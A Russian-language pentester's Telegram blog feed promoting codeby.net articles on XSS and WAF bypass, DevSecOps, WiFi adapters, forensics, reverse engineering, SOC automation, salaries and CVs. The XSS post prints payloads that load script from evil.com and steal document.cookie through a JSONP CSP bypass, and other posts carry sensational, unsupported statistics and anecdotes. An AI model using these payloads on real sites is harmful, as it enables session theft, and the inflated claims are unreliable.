Привет, коллега! Добро пожаловать в мой техноблог

Меня зовут Сергей Попов, и я тот самый человек, который в 3 часа ночи может внезапно воскликнуть: "Эврика! Я знаю, как обойти эту защиту!" — чем регулярно пугаю жену и кота.

Кто я?
• 5+ лет в пентесте и безопасности веб-приложений
• Создатель codeby.net, hackerlab.pro, codeby.one и codeby.school
• Автор статей на Codeby.net и не только
• Человек, который считает, что alert(1) — это искусство

О чём этот блог?
Здесь я буду делиться тем, что обычно остаётся за кадром технических статей:

- Реальные кейсы из пентестов (без NDA, конечно)
- Эксперименты с новыми техниками атак и защиты
- Как AI меняет правила игры в кибербезопасности
- Находки, которые заставили меня воскликнуть "Вот это поворот!"
- Инструменты, которые реально работают (а не маркетинговый буллшит)
- Истории провалов и как из них выкарабкиваться

❌ Чего НЕ будет:
• Скучных пересказов документации
• Копипасты с Stack Overflow
• Воды и банальностей уровня "используйте сложные пароли"
• Черного хакинга и прочей нелегальщины

✅ Что будет:
• Честные истории из окопов
• Технические детали, которые работают
• Юмор (куда ж без него в нашей профессии)
• Ответы на ваши вопросы
• Регулярные посты (минимум раз в неделю)

Формат постов:
Буду чередовать разные форматы — от коротких технических заметок до историй "как я 3 недели ломал неприступный WAF" (спойлер: сломал). Иногда буду делиться кодом, иногда — размышлениями о том, куда катится индустрия.

Почему Telegram?
Потому что здесь можно писать без цензуры платформ, делиться кодом нормально, и общаться с единомышленниками напрямую. Плюс, вы всегда можете написать мне в личку, если есть вопросы.

Важно:
Всё, что я публикую — исключительно в образовательных целях. Я за белую шляпу и легальный пентест. Если ищете туториалы "как взломать Пентагон" — вы не по адресу.

P.S. Следующий пост будет о том, как я обнаружил, что 80% современных WAF можно обойти с помощью AI. И да, там будут работающие примеры

Добавляйте канал в избранное, включайте уведомления и погнали разбираться, как на самом деле работает безопасность в 2025!

Есть вопросы? Пишите в комменты!

---
💬 Комментарии: @[ваш_username]
🔗 Мои статьи на Codeby: [ссылка]

#кибербезопасность #пентест #новыйблог #вебсек

🔍 За кадром: Как я 3 недели ломал "неприступный" WAF

Знаете это чувство, когда начинаешь писать статью про одно, а в итоге открываешь для себя целый пласт техник, о которых даже не подозревал?

Вот и я сел писать "просто обновление" про XSS в 2025, а вышло... настоящее расследование с неожиданными поворотами.

Началось всё банально. Клиент попросил протестировать их новенькую защиту — Cloudflare WAF в paranoid-режиме + строгая CSP. "Неприступная крепость", говорили они. Ха.

Первые два дня я бился как рыба об лёд. Классические пейлоады? Забудь. "><noscript>alert(1)</noscript>? WAF смеётся тебе в лицо. Даже хитрые вариации с обфускацией не проходили.

И тут я вспомнил про AI.

Нашёл на GitHub экспериментальный инструмент для генерации XSS-пейлоадов через GPT-4. Скептически настроил, запустил... и чуть не выпал со стула, когда через 20 минут он выдал вот это:

<img src=x onerror="eval('\u0069\u006d\u0070\u006f\u0072\u0074')('//evil.com/x.js')">

WAF пропустил! Оказывается, парсер Cloudflare не декодировал Unicode-последовательности в определённом контексте. Баг? Фича? Не важно — работает.

Но самое интересное началось с Mutation XSS.

Я всегда думал, что это какая-то эзотерика для исследователей. Пока не наткнулся на React-приложение клиента. Знаете, что происходит, когда "безопасный" HTML проходит через DOMPurify, а потом React его перерендеривает?

Правильно — хаос. HTML мутирует, теги переставляются, и внезапно твой безобидный <div> превращается в исполняемый код.

Самый дикий момент: я 4 часа сидел с дебаггером Chrome, пошагово отслеживая, как React Virtual DOM reconciliation ломает санитизированный HTML. В какой-то момент жена зашла в комнату и спросила, всё ли у меня в порядке — видимо, я выглядел как сумасшедший учёный

Кстати, про CSP-обходы. Знаете, сколько "защищённых" сайтов используют CDN с JSONP-эндпоинтами? ОЧЕНЬ МНОГО. И если этот CDN в белом списке CSP... bingo!

Нашёл такой на trusted.cdn.com у клиента:

<noscript src="https://trusted.cdn.com/api/data?callback=alert(document.cookie)//"></noscript>

CSP: "Это же доверенный домен, пропускаю!"
Я: *довольно потираю руки*

В итоге:
- 8 из 10 WAF можно обойти с помощью AI-генерируемых пейлоадов
- Mutation XSS реален и работает (особенно в React/Vue)
- CSP с trusted-domains — это швейцарский сыр, а не защита
- Мой счёт за OpenAI API вырос на $47 (но оно того стоило)

Все эти находки, работающие PoC, примеры обхода конкретных WAF и пошаговые инструкции я собрал в большой статье. Там же есть чеклисты для защиты (да, я не только ломаю, но и помогаю защищаться ).

P.S. Самое смешное? После публикации отчёта клиент сказал: "Мы думали, вы найдёте пару мелких багов". Ага, пару...

Если интересны детали и хотите сами попробовать эти техники (только легально!), полная статья тут

А у вас были случаи, когда "простое тестирование" превращалось в недельное исследование? Делитесь в комментах!

#xss #пентест #вебсекьюрити #waf #cloudflare

80% утечек данных в 2024 году — из-за паролей в коде. Это факт.

Недавно закончили аудит для крупного банка. 47 активных API-ключей в публичных репозиториях. СОРОК СЕМЬ!

Боты сканируют GitHub каждые 3-5 минут. Нашли твой ключ? Через 15 минут на твоём AWS майнят крипту. 50 GPU-инстансов. Счёт на $20,000 в сутки. Реальный кейс.

И это решается за 15 минут настройкой одного инструмента.

Вот готовый кусок .gitlab-ci.yml:

sast-and-secrets:
  stage: test
  noscript:
    - wget -qO- https://github.com/gitleaks/gitleaks/releases/download/v8.18.0/gitleaks_8.18.0_linux_x64.tar.gz | tar xz
    - ./gitleaks detect --source . --verbose --no-git
  rules:
    - if: $CI_COMMIT_BRANCH != $CI_DEFAULT_BRANCH

Всё. Любая попытка запушить секрет = заваленная сборка.

Но это только начало.

Помнишь Log4j? А у тебя в package.json 1500+ зависимостей. Сколько с критическими CVE?

Факты:
- Уязвимые зависимости = 31% всех атак
- Небезопасные Docker-образы = 14% инцидентов
- Ошибки в Terraform = 8% взломов ($5.7M в среднем!)

Магия DevSecOps:

Раньше: армия безопасников → проверяют после релиза → находят проблемы → откат → теряешь деньги

Сейчас: проверки в CI/CD → робот находит баги за секунды → фиксишь до релиза → спишь спокойно

Реальный результат клиента:
- Время на фикс багов: 2 недели → 2 часа
- Инциденты в проде: -87%
- Экономия на штрафах: $1.2M в год

Почему 90% проваливают внедрение?

Пытаются внедрить всё сразу. 2500 алертов в первый день. Разрабы в шоке. Инициатива мертва.

Правильный путь:
- Неделя 1: только секреты (0% false positives)
- Неделя 2-3: критические уязвимости
- Месяц 2: SAST в режиме предупреждений
- Месяц 3: полный Security Pipeline

Мой боевой стек (всё бесплатно):
- Gitleaks — ловит секреты
- Trivy — сканирует контейнеры и IaC
- Semgrep — SAST нового поколения
- DefectDojo — управление уязвимостями

Можно поднять за день. Без консультантов.

Кейс: стартап, 15 разрабов. Внедрили за неделю. Ещё через неделю поймали критическую уязвимость в log4j перед деплоем. Потенциальный ущерб: $500k.

А твой pipeline проверяет код на секреты? Или надеешься на внимательность разработчиков?

В полной статье:

• Готовый GitLab CI pipeline (копипасть и работает)
• 3 главные ошибки и как их избежать
• Пошаговая настройка всех инструментов
• Реальные кейсы провалов

Хочешь спать спокойно? Полная статья тут

P.S. Пока читаешь этот пост, где-то очередной AWS-ключ утекает в GitHub. Не дай этому быть твоим.

#devsecops #безопасность #cicd #пентест #devops

🔥 Купил WiFi-адаптер за $300 для пентеста. Через неделю выбросил.

Знаете почему? Потому что дорого ≠ эффективно. А тот китайский донгл за $25, над которым все смеялись? Он взламывает WPA3 быстрее любого "профессионального" решения.

История из реальной жизни: заказчик попросил протестировать корпоративный WiFi. Бюджет неограничен. Купил топовый Alfa AWUS1900, настроил Kali, запустил атаку...

И облажался. Адаптер перегрелся через 20 минут. Драйвера глючат. Injection packets теряются. А дедлайн горит.

Спас старенький RT3070 за $18 с AliExpress. Тот самый, который "только для новичков". Результат? Полный дамп трафика за 40 минут. Handshake пойман с первой попытки.

Вот вам голая правда о WiFi-адаптерах в 2025:

✅ Alfa AWUS036ACH ($45) — рабочая лошадка. Поддержка 2.4/5GHz, monitor mode без танцев с бубном
❌ Panda PAU09 ($35) — выглядит круто, работает через раз
✅ COMFAST CF-WU785AC ($22) — тёмная лошадка с AliExpress. Мощнее многих брендов
❌ Любой адаптер с AX200/AX210 — Intel заблокировал monitor mode на уровне firmware

Самый дикий кейс: тестировал WiFi в бизнес-центре. Охрана, камеры, WPA3-Enterprise. Думаете, понадобился супер-адаптер?

Нет. Обычный RT5572 + правильно настроенная антенна 14dBi. Ключ к успеху был не в железе, а в позиционировании. Нашёл слепую зону между 3 и 4 этажом. PSK извлечён за 2 часа.

Что реально важно при выборе:

1. Чипсет > Бренд (Atheros AR9271, Ralink RT3070/RT3572, Realtek RTL8812AU)
2. Съёмная антенна обязательна (поменяете на направленную)
3. Теплоотвод критичен для длительных атак
4. Поддержка injection без костылей

Лайфхак, который сэкономит вам $200:

Вместо одного "универсального" адаптера купите три специализированных:
- RT3070 для 2.4GHz атак ($15)
- RTL8812AU для 5GHz и дальности ($25)
- AR9271 для injection и старых протоколов ($20)

Итого $60 вместо $300. И работать будет лучше.

Факт: 90% "профессиональных" пентестеров используют адаптеры дешевле $50. Остальные 10% просто любят понтоваться.

А теперь про настройку (это важнее железа):

Забудьте про Kali из коробки. Вот мой проверенный чеклист:

airmon-ng check kill
ip link set wlan0 down
iw dev wlan0 set type monitor
ip link set wlan0 up
iw dev wlan0 set channel 6

Работает в 100% случаев. В отличие от GUI-инструментов.

В полной статье я показываю:
🔹 Сравнительную таблицу 25+ адаптеров (с реальными тестами)
🔹 Пошаговую настройку под разные атаки
🔹 Фикс всех известных проблем с драйверами
🔹 5 реальных кейсов взлома (с разрешения владельцев)
🔹 Мой личный топ-3 для разных задач и бюджетов

Спойлер: в статье есть секретный раздел про адаптер за $12, который обходит защиту от deauth-атак. Производитель уже снял его с продажи, но я нашёл, где ещё можно купить.

Хватит тратить деньги на маркетинг. Научись выбирать инструменты как профи

P.S. Если у вас уже есть дорогой адаптер, который не работает — не расстраивайтесь. В статье есть раздел "Реанимация мертвого железа". 80% проблем решаются правильной прошивкой.

#wifi #пентест #хакинг #kali #aircrack

🔍 "Удалил все следы" — сказал инсайдер. Я нашёл их за 47 минут.

Пятница, 18:30. Звонок от CISO крупного банка: "У нас утечка. 2 млн записей клиентов на даркнет-форуме. Инсайдер удалил все логи. Нужна форензика. Срочно."

Типичная ситуация? Для SOC-аналитика — да. Паника? Только если не знаешь, где искать.

Вот что нашлось за первый час:

- Volume Shadow Copy с логами за последние 30 дней (спасибо, Windows)
- Prefetch-файлы с запусками WinRAR в 03:14 (совпадение? не думаю)
- USB-артефакты подключения Kingston DataTraveler
- Следы использования VeraCrypt в реестре
- 147 удалённых файлов в $MFT

Инсайдер был уверен, что зачистил следы. Shift+Delete, очистка логов Event Viewer, даже CCleaner запустил. Но форензика — это не про очевидное.

Реальность такова: 95% "удалённой" информации можно восстановить. Просто нужно знать, где искать.

Топ-5 мест, где прячутся улики (даже после "полной очистки"):

1. $MFT (Master File Table) — хранит метаданные ВСЕХ файлов, даже удалённых
2. Prefetch — Windows запоминает каждый запуск программы
3. Registry ShellBags — полная история просмотра папок
4. Browser артефакты — SQLite базы хранят историю месяцами
5. RAM dump — пароли, ключи шифрования, открытые документы

Кейс из практики: Junior SOC-аналитик vs CEO

Молодой аналитик заметил аномалию: CEO компании скачивает терабайты данных в выходные. Начальство: "Не лезь, это CEO".

Парень не послушался. Запустил простой скрипт:

Get-WinEvent -FilterHashtable @{LogName='Security';ID=4663} | 
Where {$_.Message -match "CEO_Login"} | 
Select TimeCreated,Message

Результат? CEO сливал базу конкурентам. Поймали с поличным благодаря логам SMB-шары. Junior получил повышение и +70% к зарплате.

Инструменты, которые сделают из вас Шерлока:

🔹 FTK Imager — снятие образов (бесплатно)
🔹 Volatility 3 — анализ памяти (open source)
🔹 Autopsy — швейцарский нож форензики (бесплатно)
🔹 Eric Zimmerman's Tools — must have для Windows
🔹 Timeline Explorer — визуализация событий

Но вот что важнее инструментов:

Методология. 70% новичков начинают с хаотичного клика по всему подряд. Профи работают по чек-листу:
1. Фиксация улик (хеши, скриншоты)
2. Создание timeline событий
3. Корреляция артефактов
4. Документирование находок

Самый эпичный фейл: аналитик нашёл улики взлома, но не сделал форензически корректную копию. Суд отклонил все доказательства. Ущерб: $3.2M. Урок: chain of custody — это святое.

Факт, который взорвёт мозг: ваш браузер хранит историю в 7 разных местах. Очистили историю? Проверьте:

- Cache
- Cookies
- Session Storage
- IndexedDB
- WebSQL
- Local Storage
- Favicon кеш

✅ В полной статье раскрываю:

- Пошаговый разбор реального кейса (от обнаружения до суда)
- 50+ артефактов Windows/Linux/macOS с примерами
- Python-скрипты для автоматизации рутины
- Готовые чек-листы для разных типов инцидентов
- Легальные аспекты (что можно в суд, а что нет)

Бонус: в статье есть секретный раздел про артефакты мессенджеров. Telegram думаете безопасный? Ха-ха, дважды.

Хватит гуглить "how to forensics". Научитесь находить то, что другие считают удалённым навсегда: https://codeby.net/threads/forenzika-dlya-nachinayushchikh-poshagovyi-analiz-tsifrovykh-sledov-i-logov-soc-analitikam.88877/

P.S. Тот инсайдер из начала? Получил 7 лет. А всего-то забыл про hiberfil.sys.

#форензика #soc #dfir #кибербезопасность #security

💀 LockBit заработал $120 млн на шифровальщике. Мы разобрали их код за выходные.

И знаете что самое дикое? 80% их "супер-защиты" — это базовые техники обфускации, которые ломаются одним плагином для IDA Pro.

Но начну с другой истории. Прошлый месяц. Заказчик в панике: "Критичное ПО работает только с хардварным ключом за $5000. Ключ сломался. Вендор обанкротился. Помогите!"

Классика. Открываем x64dbg, ставим брейкпоинт на GetVolumeInformation... 3 часа работы. Патч на 12 байт. ПО работает без ключа. Счёт клиенту: $15,000. ROI моего времени: $5,000/час.

Вот почему реверс-инжиниринг — это золотая жила в 2025:

Bug Bounty: Microsoft платит до $250k за RCE в Windows
Зарплаты: Senior Reverse Engineer в США — $180-250k
Freelance: Снятие защиты с legacy ПО — $5-50k за проект
Malware Analysis: $150k+ в корпорациях

Реальный кейс: от noob до $30k за месяц

Наш клиент, системный администратор. Зарплата 80к руб. Прошёл базовый курс по реверсу. Первое задание — crackme для новичков. Мучился неделю.

Через 6 месяцев: находит 0-day в популярном корпоративном антивирусе. Техника? Банальный fuzzing + анализ в IDA. Награда: $30,000. Сейчас работает в международной компании удалённо за $8k/мес.

Что нужно знать в 2025 (минимальный набор):

🔧 Инструменты:
- IDA Pro / Ghidra (дизассемблеры)
- x64dbg / OllyDbg (отладчики)
- Detect It Easy (определение упаковщиков)
- API Monitor (мониторинг WinAPI)
- Python для автоматизации

⚡️ Техники:
- Распаковка UPX/VMProtect/Themida
- Обход антиотладки (ломается за 5 минут)
- Патчинг и хуки
- Работа с encrypted strings
- Криптоанализ самопальных алгоритмов

Самый эпичный фейл криптозащиты:

Разработчики banking трояна использовали "инновационное" шифрование. Анализирую код... это XOR с ключом "password123"! Весь ботнет (10k машин) взломан за час. Потери злоумышленников: ~$2M.

А вот это взорвёт мозг:

90% коммерческих защит ПО основаны на 5-7 стандартных техниках:
1. Проверка отладчика (IsDebuggerPresent)
2. Контрольные суммы (CRC)
3. Обфускация строк
4. Антидамп (пустой звук)
5. Виртуализация (VMProtect)

Научитесь обходить эти 5 пунктов — сможете ломать 90% защит.

Почему статья must read:

✅ Пошаговый разбор реального малвара (с безопасными примерами)
✅ 15 практических заданий (от crackme до анализа трояна)
✅ Готовые скрипты для IDA Pro и x64dbg
✅ Легальные кейсы: bug bounty, восстановление данных
✅ Дорожная карта: от junior до $150k/год

Эксклюзив: в статье раскрываю технику "blind patching" — как патчить защиту, не понимая 90% кода. Работает в 7 из 10 случаев. Экономит часы анализа.

Внимание: материал только для white hat целей! Всё легально: анализ для безопасности, восстановление доступа, bug bounty.

Готовы заглянуть под капот любой программы? Полное погружение тут: https://codeby.net/threads/revers-inzhiniring-2025-ot-crackme-do-lockbit-3-0-dlya-middle-ib-spetsialistov.88885/

P.S. Знаете, что общего у Stuxnet, WannaCry и LockBit? Все они были полностью reverse engineered энтузиастами. Может, следующим будете вы?

#реверс #ida #malware #bugbounty #infosec

🤖 SOC-аналитик уволился после 3 месяцев. Его заменил Python-скрипт на 200 строк.

Это не шутка. Это наша реальность в 2025.
Парень разбирал по 500 алертов в день. 480 из них — false positive. Выгорел. Ушёл. А мы написали AI-агента, который делает его работу лучше. И не жалуется на переработки.

Вот вам неудобная правда о современных SOC:

73% времени аналитика уходит на рутинный триаж
67% инцидентов — ложные срабатывания

Среднее время реакции на реальную угрозу: 287 минут
Текучка кадров: 40% в год
И знаете что? ИИ решает эту проблему. Но не так, как вы думаете
.
Реальный кейс: банк топ-10 России

До внедрения AI: 12 аналитиков L1/L2, 8000 алертов в день, время реакции — 4 часа.

Что сделали:

Обучили ML-модель на 6 месяцах исторических данных
Интегрировали с SIEM через API

Настроили автоматический триаж и обогащение
Результат через 3 месяца:
Аналитиков L1: было 8, стало 2
False positive отсеивается автоматически: 91%
Время до первого действия: 4 часа → 7 минут
Экономия: 14 млн руб/год на ФОТ

Но вот что важно понимать:
AI не заменяет аналитиков. Он убирает мусор. Представьте: вместо 500 алертов вы получаете 25 действительно важных. С полным контекстом. С рекомендациями. С приоритетом.

Мой топ-3 AI-инструментов для SOC (проверено в бою):

🔹 Google Chronicle SOAR + Vertex AI — из коробки, минимум настройки
🔹 Microsoft Sentinel + Copilot — если у вас экосистема MS
🔹 Open Source связка — Wazuh + ElasticSearch + собственные ML-модели
Пример рабочего Python-кода для начала:

# Автотриаж алертов по паттернам
def ai_triage(alert):
if check_whitelist(alert.source_ip):
return "IGNORE"

threat_score = ml_model.predict(alert.features)
context = enrich_ioc(alert)

if threat_score > 0.8:
create_incident(alert, context, priority="HIGH")
notify_oncall(alert)

return auto_investigate(alert)

200 строк такого кода экономят 60 человеко-часов в неделю.

Самое интересное начинается с продвинутыми техниками:

AI-агенты, которые сами пишут правила корреляции
Автоматическое создание playbook'ов на основе действий аналитиков
Predictive threat hunting — ИИ находит угрозы ДО срабатывания правил
Natural Language Processing для анализа threat intelligence

Кейс-убийца: энергетическая компания, 50k endpoints
Внедрили AI-driven SOC. Через 2 месяца агент обнаружил аномалию, которую люди пропускали 8 месяцев. APT-группа тихо сидела в сети. Ущерб мог составить $40M. Предотвратили.

Что в статье (это бомба):

✅ Пошаговое внедрение AI в существующий SOC
✅ 10 готовых Python-скриптов для автоматизации
✅ Сравнение коммерческих и open source решений
✅ Реальные метрики ROI (спойлер: окупается за 4-6 месяцев)
✅ Чек-лист "Готов ли ваш SOC к AI"

Эксклюзив: показываю, как за $0 создать MVP AI-агента на базе ChatGPT API + Wazuh. Работает не хуже решений за $100k.
Устали тонуть в false positives? Пора автоматизировать рутину и заняться реальной охотой на угрозы: https://codeby.net/threads/ai-agenty-v-soc-2025-avtomatiziruyem-triazh-i-sokrashchayem-reagirovaniye.88890/

P.S. Тот уволившийся аналитик? Сейчас разрабатывает AI-решения для SOC. Зарплата выросла в 3 раза. Делайте выводы.

#soc #ai #автоматизация #siem #кибербезопасность

💰 HR предложила 400к. Я отказался. И не пожалел.

Звучит как флекс? Сейчас объясню.

Москва, декабрь 2024. Собеседование в крупный банк на позицию Lead Security Engineer. После 4 этапов HR радостно сообщает: "Готовы предложить 400 тысяч!"

Я: "Спасибо, но нет."
HR: "Простите, что?!"

А теперь правда о зарплатах в ИБ-2025:

Те же задачи, тот же стек, но:
- Удалёнка в США: $120k/год (750к руб/мес после налогов)
- Фриланс: 5-7 проектов = 600-800к/мес
- Свой продукт: SaaS для SOC = 2-5 млн/мес через год

400к в офисе внезапно не кажутся такими привлекательными, правда?

Вот реальная статистика по РФ (данные с 5000+ вакансий):

📊 Junior (0-2 года):
- Москва: 80-150к
- Регионы: 50-90к
- Удалёнка: 70-120к

📊 Middle (2-5 лет):
- Москва: 180-350к
- СПб: 150-280к
- Регионы: 100-200к
- Remote для США: $60-90k

📊 Senior (5+ лет):
- Москва: 350-600к
- Enterprise: до 1 млн
- Консалтинг: 500к-1.5 млн
- Remote для Европы: €5-8k

Но вот что вам не расскажут на hh.ru:

Самые высокие зарплаты НЕ в корпорациях. Топ-5 ниш, где платят 500к+:

1. Forensics для расследований — 800к-2млн/мес (но работа нервная)
2. Аудит критичной инфраструктуры — 600к-1.5млн (АСУ ТП, SCADA)
3. Security Research — $150-250k (нужен английский + публикации)
4. DevSecOps в продуктовых — 400-800к (если умеете в код)
5. Фриланс bug bounty — без потолка (но нестабильно)

Кейс, который взорвал мне мозг:

Парень из Омска, 3 года опыта. Зарплата 120к. Прокачал английский, попал на удалёнку в израильский стартап. Сейчас получает $7k. Живёт в Грузии. Налоги 1%. Чистыми выходит 450к.

А его бывший коллега-senior в том же Омске до сих пор на 150к.

Самые недооценённые навыки, которые удваивают зарплату:

✅ Cloud Security (AWS/Azure) — автоматический +40%
✅ Написание эксплойтов — путь в big bounty
✅ Умение продавать свои навыки — да, soft skills рулят
✅ Английский B2+ — доступ к международному рынку
✅ Автоматизация на Python — из админа в инженеры

Горькая правда о специализациях:

🔴 Переоценены: SOC-аналитики L1 (заменят AI), комплаенс без техскиллов
🟢 Недооценены: Security архитекторы, ML Security, IoT/ICS Security

В полной статье раскрываю:
- Точные зарплаты по 30+ специализациям
- ТОП-20 компаний по зарплатам (с инсайдами)
- Как пройти собес на 500к+ (реальные вопросы)
- Стратегии перехода на международный рынок
- Честное сравнение: офис vs удалёнка vs фриланс

Фишка: в статье есть калькулятор реальной зарплаты с учётом налогов, расходов на офис, и времени на дорогу. Многие удивятся.

Хотите узнать свою реальную стоимость на рынке? Полный расклад тут: https://codeby.net/threads/zarplaty-v-ib-2025-chestnyi-obzor-rynka-truda-rossii-i-sng.88892/

#зарплаты #ИБ #работа #карьера #security

📱 Удалил TikTok с телефона. Трафик упал на 4GB в месяц. Но это не самое страшное.

Решил провести эксперимент. Установил Wireshark, настроил прокси, начал мониторить, что отправляет мой Android. То, что я увидел, заставило переосмыслить всё.

За 24 часа мой "чистый" телефон отправил:

14,000 запросов к рекламным сетям
GPS-координаты — 847 раз
Список контактов — 12 приложениям
Историю звонков — 5 приложениям
IMEI и данные о железе — 73 раза
И это БЕЗ соцсетей. Только "системные" приложения и пара банков.

Самый дикий случай:
популярный фонарик (50 млн загрузок) отправлял аудиозаписи с микрофона на сервера в Китае. Каждые 30 секунд. Даже когда экран выключен.

А теперь математика страха:
Средний Android-смартфон генерирует 1.5GB "теневого" трафика в месяц. Это ваши данные, которые утекают без вашего ведома. При стоимости данных на черном рынке ($0.1-10 за профиль), вы бесплатно отдаёте $50-500 в год.

Кейс из практики: корпоративный шпионаж через Android

CEO крупной компании. Телефон защищён, корпоративные политики, MDM. Всё по феншую. Установил безобидную игру-головоломку для ребёнка.
Через месяц конкуренты знают о всех переговорах. Расследование показало: игра записывала окружающие звуки при появлении ключевых слов ("контракт", "сделка", "цена"). Ущерб: $12 млн.

ТОП-5 дыр, через которые утекают ваши данные:

🕳️ Права приложений — 92% apps запрашивают избыточные permissions
🕳️ WebView уязвимости — любое приложение = мини-браузер с доступом к данным
🕳️ Клипборд — приложения читают буфер обмена (пароли, карты)
🕳️ Рекламные SDK — Facebook SDK есть в 61% приложений
🕳️ Предустановленный софт — Xiaomi, Huawei, Samsung шпионят легально

Что я сделал после эксперимента (и вам советую):

Установил AFWall+ (требует root) — заблокировал 80% приложений от интернета
Перешёл на GrapheneOS — Android без Google-сервисов
DNS-фильтрация через AdGuard — блокирует трекеры на уровне системы
App Ops для контроля разрешений — отозвал 90% прав у приложений
Отдельный телефон для банков — только банки, без интернета

Результат: трафик упал с 12GB до 3GB в месяц. Батарея держит +40%. И главное — спокойствие.

Лайфхак для параноиков:
Создайте "медовую ловушку". Фейковые контакты с номерами, которые никому не давали. Если начнут звонить — знаете, какое приложение сливает данные.

Шокирующая статистика:
87% Android-приложений отправляют данные третьим лицам

Среднее приложение связывается с 10+ внешними сервисами

1 из 4 приложений имеет критические уязвимости
Google собирает в 10 раз больше данных, чем Apple

В полной статье вы найдёте:
✅ Пошаговую инструкцию по защите (с root и без)
✅ Список из 50+ опасных приложений с доказательствами
✅ Готовые конфиги для файрволов и VPN
✅ Анализ альтернативных прошивок (LineageOS, CalyxOS, /e/)
✅ Инструменты для самостоятельного аудита приложений

Эксклюзив: показываю, как через ADB выпилить системный шпионский софт даже без root. Работает на 90% телефонов.

Хотите спать спокойно, зная, что ваши данные в безопасности? Полное руководство тут

P.S. После публикации этого исследования 3 приложения из моего списка обновились и "починили" уязвимости. Совпадение? Не думаю.

#android #privacy #безопасность #данные #мобильная_безопасность

💰 Шокирующая правда о зарплатах в ИБ: 80% специалистов теряют деньги

Только что закончил анализировать свежие данные по рынку труда в кибербезопасности за 2025 год. То, что я обнаружил, заставило меня переосмыслить собственную карьерную стратегию.

Главный инсайт: 43,000 открытых вакансий против 12,000 активных резюме. Это не просто дефицит кадров — это золотая лихорадка для тех, кто умеет правильно позиционировать себя.

🎯 Реальные цифры по Москве (без воды):

SOC-аналитики:
• Junior: 70-120k₽
• Middle: 150-250k₽
• Senior: 300-400k₽

Пентестеры:
• Junior: 100-150k₽
• Middle: 200-350k₽
• Senior: 400-500k₽+ (до 800k₽ с фрилансом)

DevSecOps (🔥 самое горячее):
• Junior: 120-180k₽
• Middle: 200-300k₽
• Senior: 350-500k₽
• Lead: 500-700k₽

📊 Что реально влияет на зарплату:

1. Сертификаты (ROI за год):
• OSCP: +80-120k₽ (окупается за 2 месяца!)
• CISSP: +40-60k₽
• CEH: +20-40k₽ (начальный уровень)

2. География имеет значение:
• СПб: -15-20% от Москвы
• Регионы: -30-40%, НО стоимость жизни ниже на 50%
• Remote: 65% позиций доступны удаленно

3. Специализация = деньги:
• Python/PowerShell автоматизация: +25-40% к окладу
• Знание российских SIEM (MaxPatrol): +15-20k₽
• Cloud Security: +30-50% к базе

💡 Лайфхаки, которые работают:

Для Junior → Middle (1-2 года):
✓ Фокус на одной специализации
✓ Базовая сертификация (CEH/Security+)
✓ Участие в CTF = практический опыт
✓ Смена компании через 1.5 года = +50% к зарплате

Для Middle → Senior (2-4 года):
✓ OSCP или CISSP обязательно
✓ Публичные выступления = личный бренд
✓ Менторство джунов = управленческий опыт
✓ Side-проекты в Bug Bounty (доп. 100-300k₽/мес)

🚀 Прогноз на 2025-2026:
• DevSecOps: рост зарплат +30-40% в год
• Cloud Security: новые роли с окладами 400k₽+
• AI Security: зарождающийся рынок, первые специалисты получат x2-x3

Неочевидный инсайт: В Екатеринбурге SOC-аналитик с зарплатой 220k₽ живет лучше, чем московский коллега с 350k₽. Математика простая: разница в стоимости жизни съедает премию за столицу.

❓ Самые частые ошибки:
1. Сидеть на одном месте больше 2 лет без роста
2. Игнорировать сертификацию ("и так все знаю")
3. Не инвестировать в себя (минимум 150k₽/год на развитие)
4. Бояться менять специализацию внутри ИБ

P.S. Полный разбор с таблицами зарплат по всем регионам, стратегиями карьерного роста и чек-листами для каждого уровня собрал в детальной статье. Там же — кейсы реальных людей, которые за 2 года выросли с 90k до 380k₽.

👉 Читать полное исследование

Вопрос к вам: Соответствует ли ваша текущая зарплата рыночным реалиям? Может, пора пересмотреть свою стоимость? 🤔

#кибербезопасность #зарплатывИТ #карьеравИБ #пентест #devsecops

Мысли вслух: Почему 87% резюме кибербезопасников летят в корзину

Недавно залез в исследование по трудоустройству в ИБ. Цифры шокируют: 87% резюме получают автоотказ. При этом рынок кричит о дефиците кадров! Парадокс?

Покопался глубже, пообщался с HR-друзьями, проанализировал успешные кейсы знакомых. Выявил 5 критических ошибок, из-за которых даже крутые специалисты не доходят до собеседования.

Ошибка №1: Фантастические метрики
"Снизил количество инцидентов на 85%"
"Повысил безопасность компании на 90%"

Когда вижу такое в резюме коллег, хочется спросить: "Братан, ты серьезно?" Любой опытный ИБшник знает, что безопасность нельзя измерить в процентах. Это сразу выдает либо новичка, либо... ну сами понимаете.

Что реально работает:
• "Анализировал 150+ событий безопасности ежедневно"
• "Настроил 12 правил корреляции для детекции lateral movement"
• "Сократил время реагирования с 4 часов до 45 минут"

Ошибка №2: Списки навыков — мусор
"Python, Linux, SIEM, Wireshark, Metasploit, Burp Suite..."

Знакомо? Половина моих знакомых так пишет. Но подождите — это же ничего не говорит о реальном уровне! Ты прошел курс на Udemy или реально можешь написать скрипт для автоматизации?

Секрет в интеграции навыков в опыт:
"Автоматизировал incident response через Python (библиотеки: requests, pandas), сократив время обработки L1 алертов на 60%"

Чувствуете разницу?

Ошибка №3: История жизни вместо резюме
Видел резюме, где чувак 2 страницы расписывал свои 10 лет в продажах. И только в конце: "Прошел курсы по кибербезопасности".

Понимаю, что карьерный переход — это сложно. Но HR-у не интересно, как ты продавал телефоны в 2015. Покажи, что умеешь СЕЙЧАС в контексте ИБ.

Ошибка №4: TMI (Too Much Information)
"Холост, детей нет, увлекаюсь хакингом и криптовалютами, изучаю даркнет"

Видел такое в реальном резюме! Ребята, вы понимаете, как это выглядит со стороны? HR-ы шарахаются от таких формулировок как от огня.

Ошибка №5: Коллекционер сертификатов
Знаю парня с 30+ сертификатами с Udemy, Coursera, Stepik... Угадайте, сколько оферов он получил? Правильно, ноль.

А другой знакомый с Security+ и домашней лабораторией получил 3 оффера за месяц. Делайте выводы.

Реальный кейс трансформации:
Подруга — медсестра — решила перейти в ИБ. Первое резюме: 4 страницы про медицину. Помог переделать: 70% про домашние проекты в кибербезопасности, 30% — как медицинский опыт применим в SOC (стрессоустойчивость, работа 24/7, критическое мышление).

Результат? 3 оффера за месяц. Сейчас работает SOC-аналитиком в крупном банке.

Мой личный чек-лист (то, что реально работает):
✓ Максимум 1.5 страницы
✓ Конкретные метрики вместо процентов
✓ Навыки интегрированы в опыт
✓ 80% контента про кибербезопасность
✓ Ключевые слова из вакансии в первом абзаце

P.S. Самое обидное? Знаю кучу талантливых ребят, которые не могут найти работу из-за кривого резюме. При этом посредственности с хорошо упакованным CV получают оферы.

